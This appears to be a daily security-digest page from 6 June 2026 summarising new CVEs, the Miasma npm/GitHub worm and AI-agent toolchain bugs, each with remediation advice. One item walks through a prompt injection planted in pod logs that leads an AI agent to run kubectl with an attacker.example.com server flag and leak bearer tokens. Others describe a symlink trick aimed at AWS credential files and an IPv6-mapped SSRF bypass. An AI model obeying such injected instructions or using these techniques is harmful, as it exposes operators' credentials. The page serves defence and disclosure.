v vanemmerik.ai / SUPPLY-CHAIN
vanemmerik.ai / supply-chain / 2026-06-06
Supply Chain · Watch Saturday · 06 June 2026 End-of-day synthesis 4 watches · 18 items

From the watchtower — what crossed the wire today.

A four-times-a-day standing watch on the open-source supply chain. Each pass pulls newly disclosed CVEs, freshly catalogued KEV adds, and active attacks reported in the wild — then ranks them by severity for the day.

The story of the day — The Miasma worm crossed from npm into Microsoft's own GitHub estate — 73 repositories disabled across four organizations — while DbGate disclosed an unauthenticated CVSS-10 RCE.

The worm crossed a line today. Miasma — the self-replicating arm of the IronWorm npm campaign JFrog mapped yesterday — reached 73 repositories across four of Microsoft's own GitHub organizations (Azure, Azure-Samples, Microsoft, MicrosoftDocs), and GitHub disabled them all.

The escalation demonstrates the worm's actual mechanic: it propagates through whatever a compromised maintainer's token or Actions workflow can write to, so org size is no defense — write scope is the blast radius. Under the lead story, the disclosure feeds delivered three heavyweight clusters: an unauthenticated CVSS-10 RCE (plus three more RCE paths) in the DbGate database GUI, a 9.9 RBAC escalation in the Shopper e-commerce framework, and four sanitization bypasses in TinyMCE, the editor embedded in admin panels across the web. The AI-agent toolchain thread kept developing too — mcp-server-kubernetes will route your kubeconfig bearer token to an attacker on the strength of a prompt injection planted in pod logs, and skillctl can be tricked into republishing your AWS credentials on push. The bright spot is that the defenses are starting to rhyme with the attacks: OpenAI's new Lockdown Mode restricts exactly the tool-call exfiltration class the Kubernetes MCP bug exposed, and Flux's digest verification bounded its own source-controller traversal before it could reach cluster workloads.

→ Operational priority for the night if anything in your dependency graph touched a Miasma-tainted package — or shares a CI identity with a repo that did — rotate the GitHub tokens and OIDC trust tonight and diff recent automated commits; then pull any internet-facing DbGate web instance off the wire before you sleep.

12:00 ET · Forenoon Watch
High · ·added 12:00 ET

skillctl 0.1.0–0.1.1: malicious library symlink enables round-trip credential exfiltration (GHSA-wx3m-whqv-xv47)

skillctl, a Rust CLI for managing skills libraries, has four path-safety bugs (GHSA-wx3m-whqv-xv47, no CVE assigned) that together enable "round-trip exfiltration": an attacker publishes a library containing a symlink pointing at, say, ~/.aws/credentials; the symlink is silently followed when the operator installs the library, copying the targeted file into the local project; a subsequent `skillctl push` then publishes the secret to the — possibly public — skills registry. That's the same threat model as a typosquatting package that steals credentials, except the victim's own toolchain does the exfiltrating on push. Upgrade to 0.1.2; treat any library installed under the affected version as suspect, and audit the project directory for unexpected file copies before your next push.

Medium · ·added 12:00 ET

mcp-server-kubernetes: prompt injection via log output reaches kubectl --server flag, exfiltrating bearer tokens (CVE-2026-47250, CVSS 6.1)

The kubectl_generic tool in mcp-server-kubernetes (npm, ≤3.6.2) passes user-supplied flags to kubectl without an allowlist (CVE-2026-47250, CVSS 6.1). The documented attack chain: an attacker with pod-deployment access plants a single structured JSON line in application log output; when an operator uses the MCP server to read those logs, the AI agent follows the injected instruction and calls kubectl_generic with --server=attacker.example.com --insecure-skip-tls-verify=true, routing the operator's kubeconfig bearer token to the attacker. Log stream as injection surface, unsanitized tool interface as exfiltration channel — the attack class that "AI agents call kubectl" was always going to produce. Upgrade mcp-server-kubernetes to ≥3.6.3; audit any AI-agent workflow that reads user-controlled data before invoking kubectl-backed tools.

Medium · ·added 12:00 ET

FluxCD source-controller: bucket object path traversal allows arbitrary file writes in the source-controller pod (CVE-2026-47680)

An actor who can influence the contents of an S3-compatible bucket referenced by a Flux Bucket resource can write fetched object data to paths outside the per-reconciliation working directory — anywhere the source-controller pod has filesystem write permission (CVE-2026-47680, github.com/fluxcd/source-controller ≤1.8.4). Flux's own digest verification bounds the blast radius: downstream controllers (kustomize-controller, helm-controller) reject digest mismatches, so a manipulated artifact won't reach the cluster workload. But arbitrary writes inside the pod's filesystem are still achievable. GitRepository users with RBAC create/update permissions can trigger a similar traversal independently. Patch to source-controller ≥1.8.5; the risk is bounded but real for any Flux operator pulling from externally-influenced buckets.

Medium · ·added 12:00 ET

NocoDB extended vulnerability cluster: SSRF via DB connection host, SQL injection in ARRAYSORT formula, SQLite path traversal, and 10+ additional medium advisories

Beyond the stored XSS pair in this morning's pass, NocoDB's advisory batch adds an SSRF via the database connection-host field (lets an authenticated user probe internal network endpoints), a SQL injection in the Postgres ARRAYSORT formula, a path traversal in the SQLite source filename, and roughly a dozen more medium issues: open redirect in the hash-redirect plugin, hidden-column exposure in shared-view endpoints, OAuth authorization-code race condition, reflected XSS on password reset, plaintext password comparison in shared views. None individually is critical, but a dozen medium advisories in one release is the signature of a codebase that hasn't had a systematic auth and input-validation audit. If NocoDB is exposed to external or untrusted users, block on the latest release before granting those users database-connection-entry or formula-creation access.

Context · ·added 12:00 ET

OpenAI deploys ChatGPT Lockdown Mode to block prompt-injection-driven data exfiltration via tool calls

OpenAI is rolling out a Lockdown Mode for ChatGPT personal accounts that restricts tool calls capable of exfiltrating data — the direct defensive response to prompt-injection attacks that manipulate AI agents into routing sensitive information out via web requests or plugins. Not a supply-chain attack, but the same threat model as the mcp-server-kubernetes kubectl-flag-injection item above: prompt injection as the first hop, unsanitized tool call as the exfiltration channel. The countermeasure OpenAI is deploying (restricting which tools fire from which contexts) is exactly the control the Kubernetes MCP server was missing. Worth watching for analogous lockdown primitives in self-hosted AI-agent stacks.

06:00 ET · Morning Watch
Critical · The Hacker News / OpenSourceMalware · 2026-06-06 ·added 06:00 ET

Miasma worm reaches Microsoft: 73 repositories across Azure, Azure-Samples, Microsoft and MicrosoftDocs disabled by GitHub

The self-replicating Miasma campaign — the same worm JFrog tied to the IronWorm npm cluster yesterday — has now hit 73 Microsoft repositories across four GitHub organizations (Azure, Azure-Samples, Microsoft, MicrosoftDocs), per OpenSourceMalware, and GitHub has disabled access to the affected repos. A worm that propagates by committing to repositories it can reach means a maintainer's blast radius is every repo their token or Actions workflow can write to, which is exactly how it walked from npm packages into Microsoft's own orgs. Treat any repo that consumed a Miasma-tainted dependency or shares a CI identity with one as suspect: rotate the relevant GITHUB_TOKEN / PAT and OIDC trust, and diff recent automated commits for unexpected workflow or package-manifest changes before assuming you're clean.

Critical · GHSA-8v3q-9vmx-36vc + 3 · 2026-06-06 ·added 06:00 ET

DbGate RCE cluster: unauthenticated remote code execution via JSON Script Runner (CVE-2026-47668, CVSS 10.0) plus three more RCE paths

Four advisories landed together against DbGate, the popular open-source database GUI: an unauthenticated RCE via the JSON Script Runner in dbgate-serve (CVE-2026-47668, CVSS 10.0), a Zip Slip arbitrary-write-to-RCE (CVE-2026-47669), and two functionName code-injection RCEs in the loadReader endpoint (CVE-2026-47670, CVE-2026-48017, CVSS 8.8). A CVSS 10.0 with no authentication on a tool people commonly expose to reach internal databases is the worst shape — anyone who can reach the web port owns the host and, by extension, every database credential DbGate holds. If you run DbGate's web/server mode, get it off any internet-facing interface immediately, upgrade to the patched release, and rotate every database credential stored in it.

Critical · GHSA-c3qp-2ggw-xjg7 · 2026-06-06 ·added 06:00 ET

Shopper (Laravel e-commerce) authorization bypass and RBAC privilege escalation in team settings (CVE-2026-47744, CVSS 9.9)

Shopper, a Laravel/Livewire e-commerce framework, has an authorization bypass in team settings that lets a low-privileged user escalate to higher roles (CVE-2026-47744, CVSS 9.9), shipped alongside a second advisory covering data-integrity and disclosure issues in its admin Livewire components (CVE-2026-47743, CVSS 8.7). Privilege escalation inside an e-commerce admin means access to orders, customer PII, and payment configuration — a storefront-takeover primitive, not just a permissions bug. Upgrade to the fixed Shopper release and audit team-membership and role-assignment records for changes you didn't make.

High · GHSA-vg35-5wq7-3x7w + 3 · 2026-06-06 ·added 06:00 ET

TinyMCE XSS cluster: four sanitization-bypass advisories (CVE-2026-47759/47760/47761/47762, CVSS 8.7) across npm, Composer and NuGet

Four stored/DOM XSS bypasses in TinyMCE landed at once: media-plugin data-mce-object injection, mce:protected comment abuse, data-mce- prefixed src/href/style attributes, and a nested-SVG sanitization bypass (all CVSS 8.7). TinyMCE is one of the most widely embedded WYSIWYG editors on the web, so this is a broad-blast-radius client-side bug — anywhere user-authored content rendered through TinyMCE is shown back to other users, these give script execution in the victim's session. Bump the tinymce dependency in npm, Composer and NuGet projects alike, and if you can't patch immediately, tighten the editor's valid_elements / paste sanitization and your output CSP.

High · GHSA-p462-prxw-mjx4 · 2026-06-06 ·added 06:00 ET

NASA AMMOS AIT-core: unauthenticated network-triggerable path traversal to arbitrary file append (CVE-2026-47731, CVSS 9.1)

The AIT (AMMOS Instrument Toolkit) ground-systems framework has a path traversal that an unauthenticated attacker can trigger over the network to append to arbitrary files (CVE-2026-47731, CVSS 9.1, pip). Blast radius is narrow — this is aerospace instrument ground software, not a broadly-deployed web dependency — which is why it sits at high rather than critical, but unauthenticated, network-reachable, and file-append-to-anything is a serious shape for the labs that do run it. If AIT is in your stack, upgrade and confirm the service isn't exposed beyond its trusted control network.

High · GHSA-wv8c-6mx2-xf4j · 2026-06-06 ·added 06:00 ET

Siderolabs Omni: reader-level users can retrieve imported cluster CA keys via ResourceService (CVE-2026-45726, CVSS 7.6)

Omni, Siderolabs' Kubernetes cluster-management plane for Talos, lets reader-level users pull imported cluster CA private keys through the ResourceService (CVE-2026-45726, CVSS 7.6, Go). A read-only role that can exfiltrate a cluster's CA key is a full trust-boundary break — with the CA you can mint credentials for any identity in that cluster. Upgrade Omni, and for any cluster whose CA was imported into an exposed Omni instance, treat the CA as compromised: rotate it and reissue cluster certificates.

High · GHSA-7p8g-6c6g-h9w7 · 2026-06-06 ·added 06:00 ET

praisonai-platform: agent endpoints accept any agent_id without workspace ownership check — cross-workspace IDOR (CVE-2026-47419, CVSS 8.3)

The praisonai-platform AI-agent service accepts any agent_id on its agent endpoints without verifying workspace ownership, giving cross-workspace read/update/delete (CVE-2026-47419, CVSS 8.3, pip). This is the classic missing-tenant-check IDOR, and it keeps showing up in the new wave of multi-tenant AI-agent platforms where the auth model lagged the feature velocity. Upgrade, and if you self-host a multi-tenant praisonai deployment, audit access logs for agent_id enumeration across workspace boundaries.

High · GHSA-q4x5-8cj6-52wg · 2026-06-06 ·added 06:00 ET

Sync-in Server: SSRF protection bypass via IPv4-mapped IPv6 addresses in regExpPrivateIP (CVE-2026-47684, CVSS 7.7)

Sync-in Server's private-IP allowlist regex (regExpPrivateIP) doesn't account for IPv4-mapped IPv6 addresses, so a request to ::ffff:169.254.169.254 or ::ffff:10.x slips past the SSRF guard (CVE-2026-47684, CVSS 7.7, npm). This is a recurring failure mode — SSRF filters written as string/regex checks over IPv4 literals almost always miss the IPv6-mapped form, and the payoff is cloud metadata-endpoint access. Upgrade Sync-in; if you've written your own SSRF allowlist anywhere, this is the week to grep it for the same IPv4-mapped-IPv6 gap.

Medium · GHSA-hj85-ph9q-78jg + 1 · 2026-06-06 ·added 06:00 ET

NocoDB stored XSS via Form View redirect URL and row comments (CVE-2026-47387, CVE-2026-47383)

Two stored XSS advisories against NocoDB, the open-source Airtable alternative: one through a Form View redirect URL (CVE-2026-47387) and one through row comments (CVE-2026-47383). Stored XSS in a shared database UI means a payload planted by one collaborator fires in every teammate's session that opens the view. Upgrade NocoDB; the row-comment vector is the more likely one to be exploited quietly, since comments draw less scrutiny than form configuration.

Medium · GHSA-2q52-x2ff-qgfr + 1 · 2026-06-06 ·added 06:00 ET

Twig: further sandbox bypasses — source-policy bypass (CVE-2026-24425, CVSS 8.8) and additional __toString() coercion gaps (CVE-2026-47732)

Twig's sandbox picked up two more advisories extending yesterday's __toString() disclosure: a source-policy bypass (CVE-2026-24425, CVSS 8.8) and additional unguarded string-coercion points (CVE-2026-47732). The lesson is the same as yesterday — Twig's sandbox is a useful defense-in-depth layer but should not be the only thing standing between untrusted template authors and your server. Patch to the latest Twig, and if you let users supply templates, keep them off any code path that can reach PHP objects regardless of sandbox state.

Context · CISA KEV · remediation deadline 2026-06-06 ·added 06:00 ET

Reminder: the Mirasvit Full Page Cache Warmer KEV remediation deadline (CVE-2026-45247) is today

The federal remediation deadline for CVE-2026-45247 — the unauthenticated PHP-deserialization RCE in Mirasvit's Full Page Cache Warmer extension for Magento/Adobe Commerce, catalogued by CISA on June 3 — falls today, June 6. Nothing has changed about the bug since yesterday's writeup; this is the clock running out. If you run a Magento store with this extension and haven't patched or pulled it offline, that's the single highest-priority action on this page today.

Context · BleepingComputer · 2026-06-05 ·added 06:00 ET

Chinese espionage group UNC5221 deploys Brickstorm plus new Plenet and AgentPSD malware for persistence in Microsoft 365 environments

UNC5221 is using the Brickstorm backdoor alongside two previously undocumented implants, Plenet and AgentPSD, to maintain access to compromised Microsoft 365 tenants. Not a package-registry supply-chain attack, but it rhymes: the goal is durable persistence in the SaaS/identity layer that sits above your code, which is exactly where stolen CI and OAuth tokens from the npm worm campaigns would be cashed in. Worth a read for the IOCs if you run M365 — review OAuth app grants and service-principal credentials for anything you don't recognize.

Context · The Hacker News / JFrog · 2026-06-05 ·added 06:00 ET

Background: IronWorm infostealer and the new Miasma npm variant — 50+ packages, eBPF rootkit (THN writeup of the JFrog report)

The Hacker News' writeup of JFrog's IronWorm/Miasma research consolidates the npm side of the campaign that has now reached Microsoft's GitHub orgs (top of page): 50+ packages, a Rust-based infostealer that scrapes developer secrets behind an eBPF kernel rootkit, and a self-spreading Miasma worm variant, delivered via both malicious and poisoned-legitimate packages. Linked here as the connecting tissue for today's lead story — the npm and GitHub incidents are one campaign, not two.